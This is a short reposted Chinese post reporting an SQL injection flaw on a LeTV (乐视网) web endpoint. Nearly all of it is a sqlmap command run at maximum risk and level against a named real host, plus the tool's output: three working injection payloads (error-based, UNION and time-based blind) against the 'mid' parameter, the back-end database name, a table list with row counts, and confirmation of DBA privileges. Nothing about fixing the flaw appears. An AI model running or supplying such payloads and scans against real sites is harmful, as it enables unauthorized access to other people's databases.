转载

乐视网存在高危SQL注入漏洞

乐视网存在高危SQL注入漏洞

sqlmap下

code 区域

sqlmap -u "http://stv.letv.com/w/m/supportmatch.action?mid=*&uid=null" --dbms=MySQL --risk=3 --level=5 --count --threads=10

code 区域

Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-5187) OR (SELECT 7463 FROM(SELECT COUNT(*),CONCAT(0x716e637671,(SELECT (CASE WHEN (7463=7463) THEN 1 ELSE 0 END)),0x716f696971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1178=1178&uid=null

Type: UNION query
Title: MySQL UNION query (random number) - 4 columns
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-3941) UNION ALL SELECT CONCAT(0x716e637671,0x524a4a72637862494f4d,0x716f696971),8473,8473,8473#&uid=null

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://stv.letv.com:80/w/m/supportmatch.action?mid=-2026) OR 5639=SLEEP(5) AND (2828=2828&uid=null
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
Database: sodaweb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| w1_t_login_log | 288 |
| t_match_support | 156 |
| t_match_support_det | 90 |
| w1_t_binding_weibo | 70 |
| t_match | 64 |
| test_t_comment | 55 |
| t_player_support | 38 |
| t_team_support | 34 |
| t_player_support_det | 29 |
| t_comment | 26 |
current user is DBA: True
正文到此结束
Loading...